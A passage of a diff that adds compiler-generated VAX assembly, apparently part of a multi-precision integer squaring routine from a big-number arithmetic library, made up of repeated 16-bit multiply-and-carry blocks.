+	bicl3	#32767,-8(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl3	#-65536,-8(fp),r0
+	ashl	#17,r0,-8(fp)
+	addl3	-4(fp),-8(fp),r0
+	bicl3	#0,r0,-4(fp)
+	cmpl	-4(fp),-8(fp)
+	bgequ	noname.369
+	incl	r3
+noname.369:
+	movl	-4(fp),r1
+	movl	r3,r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.370
+	incl	r2
+noname.370:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.371
+	incl	r7
+noname.371:
+
+	movl	r9,@4(ap)
+
+	clrl	r9
+
+	movzwl	6(r4),r2
+	bicl3	#-65536,(r4),r3
+	movzwl	2(r4),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r4),-20(fp)
+	bicl3	#-65536,r2,-24(fp)
+	mull3	r0,-20(fp),-12(fp)
+	mull2	r3,-20(fp)
+	mull3	r3,-24(fp),-16(fp)
+	mull2	r0,-24(fp)
+	addl3	-12(fp),-16(fp),r0
+	bicl3	#0,r0,-12(fp)
+	cmpl	-12(fp),-16(fp)
+	bgequ	noname.372
+	addl2	#65536,-24(fp)
+noname.372:
+	movzwl	-10(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-24(fp)
+	bicl3	#-65536,-12(fp),r0
+	ashl	#16,r0,-16(fp)
+	addl3	-16(fp),-20(fp),r0
+	bicl3	#0,r0,-20(fp)
+	cmpl	-20(fp),-16(fp)
+	bgequ	noname.373
+	incl	-24(fp)
+noname.373:
+	movl	-20(fp),r3
+	movl	-24(fp),r2
+	bbc	#31,r2,noname.374
+	incl	r9
+noname.374:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.375
+	incl	r2
+noname.375:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.376
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.376
+	incl	r9
+noname.376:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.377
+	incl	r9
+noname.377:
+
+	movl	4(ap),r0
+	movl	r8,4(r0)
+
+	clrl	r8
+
+	movl	8(ap),r4
+	movl	4(r4),r3
+	bicl3	#-65536,r3,-28(fp)
+	extzv	#16,#16,r3,r0
+	bicl3	#-65536,r0,r3
+	movl	-28(fp),r0
+	mull3	r0,r3,-32(fp)
+	mull3	r0,r0,-28(fp)
+	mull2	r3,r3
+	bicl3	#32767,-32(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r3
+	bicl3	#-65536,-32(fp),r0
+	ashl	#17,r0,-32(fp)
+	addl3	-28(fp),-32(fp),r0
+	bicl3	#0,r0,-28(fp)
+	cmpl	-28(fp),-32(fp)
+	bgequ	noname.378
+	incl	r3
+noname.378:
+	movl	-28(fp),r1
+	movl	r3,r2
+	addl2	r1,r7
+	bicl2	#0,r7
+	cmpl	r7,r1
+	bgequ	noname.379
+	incl	r2
+noname.379:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.380
+	incl	r8
+noname.380:
+
+	movzwl	10(r4),r2
+	bicl3	#-65536,(r4),r3
+	movzwl	2(r4),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r4),-44(fp)
+	bicl3	#-65536,r2,-48(fp)
+	mull3	r0,-44(fp),-36(fp)
+	mull2	r3,-44(fp)
+	mull3	r3,-48(fp),-40(fp)
+	mull2	r0,-48(fp)
+	addl3	-36(fp),-40(fp),r0
+	bicl3	#0,r0,-36(fp)
+	cmpl	-36(fp),-40(fp)
+	bgequ	noname.381
+	addl2	#65536,-48(fp)
+noname.381:
+	movzwl	-34(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-48(fp)
+	bicl3	#-65536,-36(fp),r0
+	ashl	#16,r0,-40(fp)
+	addl3	-40(fp),-44(fp),r0
+	bicl3	#0,r0,-44(fp)
+	cmpl	-44(fp),-40(fp)
+	bgequ	noname.382
+	incl	-48(fp)
+noname.382:
+	movl	-44(fp),r3
+	movl	-48(fp),r2
+	bbc	#31,r2,noname.383
+	incl	r8
+noname.383:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.384
+	incl	r2
+noname.384:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.385
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.385
+	incl	r8
+noname.385:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.386
+	incl	r8
+noname.386:
+
+	movl	4(ap),r0
+	movl	r7,8(r0)
+
+	clrl	r7
+
+	movl	8(ap),r0
+	movzwl	14(r0),r2
+	bicl3	#-65536,(r0),r3
+	movzwl	2(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r0),-60(fp)
+	bicl3	#-65536,r2,-64(fp)
+	mull3	r1,-60(fp),-52(fp)
+	mull2	r3,-60(fp)
+	mull3	r3,-64(fp),-56(fp)
+	mull2	r1,-64(fp)
+	addl3	-52(fp),-56(fp),r0
+	bicl3	#0,r0,-52(fp)
+	cmpl	-52(fp),-56(fp)
+	bgequ	noname.387
+	addl2	#65536,-64(fp)
+noname.387:
+	movzwl	-50(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-64(fp)
+	bicl3	#-65536,-52(fp),r0
+	ashl	#16,r0,-56(fp)
+	addl3	-56(fp),-60(fp),r0
+	bicl3	#0,r0,-60(fp)
+	cmpl	-60(fp),-56(fp)
+	bgequ	noname.388
+	incl	-64(fp)
+noname.388:
+	movl	-60(fp),r3
+	movl	-64(fp),r2
+	bbc	#31,r2,noname.389
+	incl	r7
+noname.389:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.390
+	incl	r2
+noname.390:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.391
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.391
+	incl	r7
+noname.391:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.392
+	incl	r7
+noname.392:
+
+	movl	8(ap),r0
+	movzwl	10(r0),r2
+	bicl3	#-65536,4(r0),r3
+	movzwl	6(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,8(r0),-76(fp)
+	bicl3	#-65536,r2,-80(fp)
+	mull3	r1,-76(fp),-68(fp)
+	mull2	r3,-76(fp)
+	mull3	r3,-80(fp),-72(fp)
+	mull2	r1,-80(fp)
+	addl3	-68(fp),-72(fp),r0
+	bicl3	#0,r0,-68(fp)
+	cmpl	-68(fp),-72(fp)
+	bgequ	noname.393
+	addl2	#65536,-80(fp)
+noname.393:
+	movzwl	-66(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-80(fp)
+	bicl3	#-65536,-68(fp),r0
+	ashl	#16,r0,-72(fp)
+	addl3	-72(fp),-76(fp),r0
+	bicl3	#0,r0,-76(fp)
+	cmpl	-76(fp),-72(fp)
+	bgequ	noname.394
+	incl	-80(fp)
+noname.394:
+	movl	-76(fp),r3
+	movl	-80(fp),r2
+	bbc	#31,r2,noname.395
+	incl	r7
+noname.395:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.396
+	incl	r2
+noname.396:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.397
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.397
+	incl	r7
+noname.397:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.398
+	incl	r7
+noname.398:
+
+	movl	4(ap),r0
+	movl	r9,12(r0)
+
+	clrl	r9
+
+	movl	8(ap),r2
+	movl	8(r2),r4
+	bicl3	#-65536,r4,-84(fp)
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	movl	-84(fp),r0
+	mull3	r0,r4,-88(fp)
+	mull3	r0,r0,-84(fp)
+	mull2	r4,r4
+	bicl3	#32767,-88(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-88(fp),r0
+	ashl	#17,r0,-88(fp)
+	addl3	-84(fp),-88(fp),r0
+	bicl3	#0,r0,-84(fp)
+	cmpl	-84(fp),-88(fp)
+	bgequ	noname.399
+	incl	r4
+noname.399:
+	movl	-84(fp),r1
+	movl	r4,r3
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.400
+	incl	r3
+noname.400:
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.401
+	incl	r9
+noname.401:
+
+	movzwl	14(r2),r3
+	bicl3	#-65536,4(r2),r1
+	movzwl	6(r2),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r2),-100(fp)
+	bicl3	#-65536,r3,-104(fp)
+	mull3	r0,-100(fp),-92(fp)
+	mull2	r1,-100(fp)
+	mull3	r1,-104(fp),-96(fp)
+	mull2	r0,-104(fp)
+	addl3	-92(fp),-96(fp),r0
+	bicl3	#0,r0,-92(fp)
+	cmpl	-92(fp),-96(fp)
+	bgequ	noname.402
+	addl2	#65536,-104(fp)
+noname.402:
+	movzwl	-90(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-104(fp)
+	bicl3	#-65536,-92(fp),r0
+	ashl	#16,r0,-96(fp)
+	addl3	-96(fp),-100(fp),r0
+	bicl3	#0,r0,-100(fp)
+	cmpl	-100(fp),-96(fp)
+	bgequ	noname.403
+	incl	-104(fp)
+noname.403:
+	movl	-100(fp),r3
+	movl	-104(fp),r2
+	bbc	#31,r2,noname.404
+	incl	r9
+noname.404:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.405
+	incl	r2
+noname.405:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.406
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.406
+	incl	r9
+noname.406:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.407
+	incl	r9
+noname.407:
+
+	movl	8(ap),r0
+	movzwl	18(r0),r2
+	bicl3	#-65536,(r0),r3
+	movzwl	2(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r0),-116(fp)
+	bicl3	#-65536,r2,-120(fp)
+	mull3	r1,-116(fp),-108(fp)
+	mull2	r3,-116(fp)
+	mull3	r3,-120(fp),-112(fp)
+	mull2	r1,-120(fp)
+	addl3	-108(fp),-112(fp),r0
+	bicl3	#0,r0,-108(fp)
+	cmpl	-108(fp),-112(fp)
+	bgequ	noname.408
+	addl2	#65536,-120(fp)
+noname.408:
+	movzwl	-106(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-120(fp)
+	bicl3	#-65536,-108(fp),r0
+	ashl	#16,r0,-112(fp)
+	addl3	-112(fp),-116(fp),r0
+	bicl3	#0,r0,-116(fp)
+	cmpl	-116(fp),-112(fp)
+	bgequ	noname.409
+	incl	-120(fp)
+noname.409:
+	movl	-116(fp),r3
+	movl	-120(fp),r2
+	bbc	#31,r2,noname.410
+	incl	r9
+noname.410:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.411
+	incl	r2
+noname.411:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.412
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.412
+	incl	r9
+noname.412:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.413
+	incl	r9
+noname.413:
+
+	movl	4(ap),r0
+	movl	r8,16(r0)
+
+	clrl	r8
+
+	movl	8(ap),r0
+	movzwl	22(r0),r2
+	bicl3	#-65536,(r0),r3
+	movzwl	2(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r0),-132(fp)
+	bicl3	#-65536,r2,-136(fp)
+	mull3	r1,-132(fp),-124(fp)
+	mull2	r3,-132(fp)
+	mull3	r3,-136(fp),-128(fp)
+	mull2	r1,-136(fp)
+	addl3	-124(fp),-128(fp),r0
+	bicl3	#0,r0,-124(fp)
+	cmpl	-124(fp),-128(fp)
+	bgequ	noname.414
+	addl2	#65536,-136(fp)
+noname.414:
+	movzwl	-122(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-136(fp)
+	bicl3	#-65536,-124(fp),r0
+	ashl	#16,r0,-128(fp)
+	addl3	-128(fp),-132(fp),r0
+	bicl3	#0,r0,-132(fp)
+	cmpl	-132(fp),-128(fp)
+	bgequ	noname.415
+	incl	-136(fp)
+noname.415:
+	movl	-132(fp),r3
+	movl	-136(fp),r2
+	bbc	#31,r2,noname.416
+	incl	r8
+noname.416:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.417
+	incl	r2
+noname.417:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.418
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.418
+	incl	r8
+noname.418:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.419
+	incl	r8
+noname.419:
+
+	movl	8(ap),r0
+	movzwl	18(r0),r2
+	bicl3	#-65536,4(r0),r3
+	movzwl	6(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r0),-148(fp)
+	bicl3	#-65536,r2,-152(fp)
+	mull3	r1,-148(fp),-140(fp)
+	mull2	r3,-148(fp)
+	mull3	r3,-152(fp),-144(fp)
+	mull2	r1,-152(fp)
+	addl3	-140(fp),-144(fp),r0
+	bicl3	#0,r0,-140(fp)
+	cmpl	-140(fp),-144(fp)
+	bgequ	noname.420
+	addl2	#65536,-152(fp)
+noname.420:
+	movzwl	-138(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-152(fp)
+	bicl3	#-65536,-140(fp),r0
+	ashl	#16,r0,-144(fp)
+	addl3	-144(fp),-148(fp),r0
+	bicl3	#0,r0,-148(fp)
+	cmpl	-148(fp),-144(fp)
+	bgequ	noname.421
+	incl	-152(fp)
+noname.421:
+	movl	-148(fp),r3
+	movl	-152(fp),r2
+	bbc	#31,r2,noname.422
+	incl	r8
+noname.422:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.423
+	incl	r2
+noname.423:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.424
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.424
+	incl	r8
+noname.424:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.425
+	incl	r8
+noname.425:
+
+	movl	8(ap),r0
+	movzwl	14(r0),r2
+	bicl3	#-65536,8(r0),r3
+	movzwl	10(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,12(r0),-164(fp)
+	bicl3	#-65536,r2,-168(fp)
+	mull3	r1,-164(fp),-156(fp)
+	mull2	r3,-164(fp)
+	mull3	r3,-168(fp),-160(fp)
+	mull2	r1,-168(fp)
+	addl3	-156(fp),-160(fp),r0
+	bicl3	#0,r0,-156(fp)
+	cmpl	-156(fp),-160(fp)
+	bgequ	noname.426
+	addl2	#65536,-168(fp)
+noname.426:
+	movzwl	-154(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-168(fp)
+	bicl3	#-65536,-156(fp),r0
+	ashl	#16,r0,-160(fp)
+	addl3	-160(fp),-164(fp),r0
+	bicl3	#0,r0,-164(fp)
+	cmpl	-164(fp),-160(fp)
+	bgequ	noname.427
+	incl	-168(fp)
+noname.427:
+	movl	-164(fp),r3
+	movl	-168(fp),r2
+	bbc	#31,r2,noname.428
+	incl	r8
+noname.428:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.429
+	incl	r2
+noname.429:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r7
+	bicl2	#0,r7
+	cmpl	r7,r3
+	bgequ	noname.430
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.430
+	incl	r8
+noname.430:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.431
+	incl	r8
+noname.431:
+
+	movl	4(ap),r0
+	movl	r7,20(r0)
+
+	clrl	r7
+
+	movl	8(ap),r2
+	movl	12(r2),r4
+	bicl3	#-65536,r4,-172(fp)
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	movl	-172(fp),r0
+	mull3	r0,r4,-176(fp)
+	mull3	r0,r0,-172(fp)
+	mull2	r4,r4
+	bicl3	#32767,-176(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-176(fp),r0
+	ashl	#17,r0,-176(fp)
+	addl3	-172(fp),-176(fp),r0
+	bicl3	#0,r0,-172(fp)
+	cmpl	-172(fp),-176(fp)
+	bgequ	noname.432
+	incl	r4
+noname.432:
+	movl	-172(fp),r1
+	movl	r4,r3
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.433
+	incl	r3
+noname.433:
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.434
+	incl	r7
+noname.434:
+
+	movzwl	18(r2),r3
+	bicl3	#-65536,8(r2),r1
+	movzwl	10(r2),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r2),-188(fp)
+	bicl3	#-65536,r3,-192(fp)
+	mull3	r0,-188(fp),-180(fp)
+	mull2	r1,-188(fp)
+	mull3	r1,-192(fp),-184(fp)
+	mull2	r0,-192(fp)
+	addl3	-180(fp),-184(fp),r0
+	bicl3	#0,r0,-180(fp)
+	cmpl	-180(fp),-184(fp)
+	bgequ	noname.435
+	addl2	#65536,-192(fp)
+noname.435:
+	movzwl	-178(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-192(fp)
+	bicl3	#-65536,-180(fp),r0
+	ashl	#16,r0,-184(fp)
+	addl3	-184(fp),-188(fp),r0
+	bicl3	#0,r0,-188(fp)
+	cmpl	-188(fp),-184(fp)
+	bgequ	noname.436
+	incl	-192(fp)
+noname.436:
+	movl	-188(fp),r3
+	movl	-192(fp),r2
+	bbc	#31,r2,noname.437
+	incl	r7
+noname.437:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.438
+	incl	r2
+noname.438:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.439
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.439
+	incl	r7
+noname.439:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.440
+	incl	r7
+noname.440:
+
+	movl	8(ap),r0
+	movzwl	22(r0),r2
+	bicl3	#-65536,4(r0),r3
+	movzwl	6(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r0),-204(fp)
+	bicl3	#-65536,r2,-208(fp)
+	mull3	r1,-204(fp),-196(fp)
+	mull2	r3,-204(fp)
+	mull3	r3,-208(fp),-200(fp)
+	mull2	r1,-208(fp)
+	addl3	-196(fp),-200(fp),r0
+	bicl3	#0,r0,-196(fp)
+	cmpl	-196(fp),-200(fp)
+	bgequ	noname.441
+	addl2	#65536,-208(fp)
+noname.441:
+	movzwl	-194(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-208(fp)
+	bicl3	#-65536,-196(fp),r0
+	ashl	#16,r0,-200(fp)
+	addl3	-200(fp),-204(fp),r0
+	bicl3	#0,r0,-204(fp)
+	cmpl	-204(fp),-200(fp)
+	bgequ	noname.442
+	incl	-208(fp)
+noname.442:
+	movl	-204(fp),r3
+	movl	-208(fp),r2
+	bbc	#31,r2,noname.443
+	incl	r7
+noname.443:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.444
+	incl	r2
+noname.444:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.445
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.445
+	incl	r7
+noname.445:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.446
+	incl	r7
+noname.446:
+
+	movl	8(ap),r0
+	movzwl	26(r0),r2
+	bicl3	#-65536,(r0),r3
+	movzwl	2(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,24(r0),-220(fp)
+	bicl3	#-65536,r2,-224(fp)
+	mull3	r1,-220(fp),-212(fp)
+	mull2	r3,-220(fp)
+	mull3	r3,-224(fp),-216(fp)
+	mull2	r1,-224(fp)
+	addl3	-212(fp),-216(fp),r0
+	bicl3	#0,r0,-212(fp)
+	cmpl	-212(fp),-216(fp)
+	bgequ	noname.447
+	addl2	#65536,-224(fp)
+noname.447:
+	movzwl	-210(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-224(fp)
+	bicl3	#-65536,-212(fp),r0
+	ashl	#16,r0,-216(fp)
+	addl3	-216(fp),-220(fp),r0
+	bicl3	#0,r0,-220(fp)
+	cmpl	-220(fp),-216(fp)
+	bgequ	noname.448
+	incl	-224(fp)
+noname.448:
+	movl	-220(fp),r3
+	movl	-224(fp),r2
+	bbc	#31,r2,noname.449
+	incl	r7
+noname.449:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.450
+	incl	r2
+noname.450:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r9
+	bicl2	#0,r9
+	cmpl	r9,r3
+	bgequ	noname.451
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.451
+	incl	r7
+noname.451:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.452
+	incl	r7
+noname.452:
+
+	movl	4(ap),r0
+	movl	r9,24(r0)
+
+	clrl	r9
+
+	movl	8(ap),r0
+	movzwl	30(r0),r2
+	bicl3	#-65536,(r0),r3
+	movzwl	2(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,28(r0),-236(fp)
+	bicl3	#-65536,r2,-240(fp)
+	mull3	r1,-236(fp),-228(fp)
+	mull2	r3,-236(fp)
+	mull3	r3,-240(fp),-232(fp)
+	mull2	r1,-240(fp)
+	addl3	-228(fp),-232(fp),r0
+	bicl3	#0,r0,-228(fp)
+	cmpl	-228(fp),-232(fp)
+	bgequ	noname.453
+	addl2	#65536,-240(fp)
+noname.453:
+	movzwl	-226(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-240(fp)
+	bicl3	#-65536,-228(fp),r0
+	ashl	#16,r0,-232(fp)
+	addl3	-232(fp),-236(fp),r0
+	bicl3	#0,r0,-236(fp)
+	cmpl	-236(fp),-232(fp)
+	bgequ	noname.454
+	incl	-240(fp)
+noname.454:
+	movl	-236(fp),r3
+	movl	-240(fp),r2
+	bbc	#31,r2,noname.455
+	incl	r9
+noname.455:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.456
+	incl	r2
+noname.456:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.457
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.457
+	incl	r9
+noname.457:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.458
+	incl	r9
+noname.458:
+
+	movl	8(ap),r0
+	movzwl	26(r0),r2
+	bicl3	#-65536,4(r0),r3
+	movzwl	6(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,24(r0),-252(fp)
+	bicl3	#-65536,r2,-256(fp)
+	mull3	r1,-252(fp),-244(fp)
+	mull2	r3,-252(fp)
+	mull3	r3,-256(fp),-248(fp)
+	mull2	r1,-256(fp)
+	addl3	-244(fp),-248(fp),r0
+	bicl3	#0,r0,-244(fp)
+	cmpl	-244(fp),-248(fp)
+	bgequ	noname.459
+	addl2	#65536,-256(fp)
+noname.459:
+	movzwl	-242(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-256(fp)
+	bicl3	#-65536,-244(fp),r0
+	ashl	#16,r0,-248(fp)
+	addl3	-248(fp),-252(fp),r0
+	bicl3	#0,r0,-252(fp)
+	cmpl	-252(fp),-248(fp)
+	bgequ	noname.460
+	incl	-256(fp)
+noname.460:
+	movl	-252(fp),r3
+	movl	-256(fp),r2
+	bbc	#31,r2,noname.461
+	incl	r9
+noname.461:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.462
+	incl	r2
+noname.462:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.463
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.463
+	incl	r9
+noname.463:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.464
+	incl	r9
+noname.464:
+
+	movl	8(ap),r0
+	movzwl	22(r0),r2
+	bicl3	#-65536,8(r0),r3
+	movzwl	10(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,20(r0),-268(fp)
+	bicl3	#-65536,r2,-272(fp)
+	mull3	r1,-268(fp),-260(fp)
+	mull2	r3,-268(fp)
+	mull3	r3,-272(fp),-264(fp)
+	mull2	r1,-272(fp)
+	addl3	-260(fp),-264(fp),r0
+	bicl3	#0,r0,-260(fp)
+	cmpl	-260(fp),-264(fp)
+	bgequ	noname.465
+	addl2	#65536,-272(fp)
+noname.465:
+	movzwl	-258(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-272(fp)
+	bicl3	#-65536,-260(fp),r0
+	ashl	#16,r0,-264(fp)
+	addl3	-264(fp),-268(fp),r0
+	bicl3	#0,r0,-268(fp)
+	cmpl	-268(fp),-264(fp)
+	bgequ	noname.466
+	incl	-272(fp)
+noname.466:
+	movl	-268(fp),r3
+	movl	-272(fp),r2
+	bbc	#31,r2,noname.467
+	incl	r9
+noname.467:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.468
+	incl	r2
+noname.468:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.469
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.469
+	incl	r9
+noname.469:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.470
+	incl	r9
+noname.470:
+
+	movl	8(ap),r0
+	movzwl	18(r0),r2
+	bicl3	#-65536,12(r0),r3
+	movzwl	14(r0),r1
+	bicl2	#-65536,r1
+	bicl3	#-65536,16(r0),-284(fp)
+	bicl3	#-65536,r2,-288(fp)
+	mull3	r1,-284(fp),-276(fp)
+	mull2	r3,-284(fp)
+	mull3	r3,-288(fp),-280(fp)
+	mull2	r1,-288(fp)
+	addl3	-276(fp),-280(fp),r0
+	bicl3	#0,r0,-276(fp)
+	cmpl	-276(fp),-280(fp)
+	bgequ	noname.471
+	addl2	#65536,-288(fp)
+noname.471:
+	movzwl	-274(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-288(fp)
+	bicl3	#-65536,-276(fp),r0
+	ashl	#16,r0,-280(fp)
+	addl3	-280(fp),-284(fp),r0
+	bicl3	#0,r0,-284(fp)
+	cmpl	-284(fp),-280(fp)
+	bgequ	noname.472
+	incl	-288(fp)
+noname.472:
+	movl	-284(fp),r3
+	movl	-288(fp),r2
+	bbc	#31,r2,noname.473
+	incl	r9
+noname.473:
+	addl2	r2,r2
+	bicl2	#0,r2
+	bbc	#31,r3,noname.474
+	incl	r2
+noname.474:
+	addl2	r3,r3
+	bicl2	#0,r3
+	addl2	r3,r8
+	bicl2	#0,r8
+	cmpl	r8,r3
+	bgequ	noname.475
+	incl	r2
+	bicl3	#0,r2,r0
+	bneq	noname.475
+	incl	r9
+noname.475:
+	addl2	r2,r7
+	bicl2	#0,r7
+	cmpl	r7,r2
+	bgequ	noname.476
+	incl	r9
+noname.476:
+
+	movl	4(ap),r0
+	movl	r8,28(r0)
+
+	clrl	r8
+
+	movl	8(ap),r3
+	movl	16(r3),r4
+	bicl3	#-65536,r4,r5
+	extzv	#16,#16,r4,r0
+	bicl3	#-65536,r0,r4
+	mull3	r5,r4,-292(fp)
+	mull2	r5,r5
+	mull2	r4,r4
+	bicl3	#32767,-292(fp),r0
+	extzv	#15,#17,r0,r0
+	addl2	r0,r4
+	bicl3	#-65536,-292(fp),r0
+	ashl	#17,r0,-292(fp)
+	addl2	-292(fp),r5
+	bicl2	#0,r5
+	cmpl	r5,-292(fp)
+	bgequ	noname.477
+	incl	r4
+noname.477:
+	movl	r5,r1
+	movl	r4,r2
+	addl2	r1,r7
+	bicl2	#0,r7
+	cmpl	r7,r1
+	bgequ	noname.478
+	incl	r2
+noname.478:
+	addl2	r2,r9
+	bicl2	#0,r9
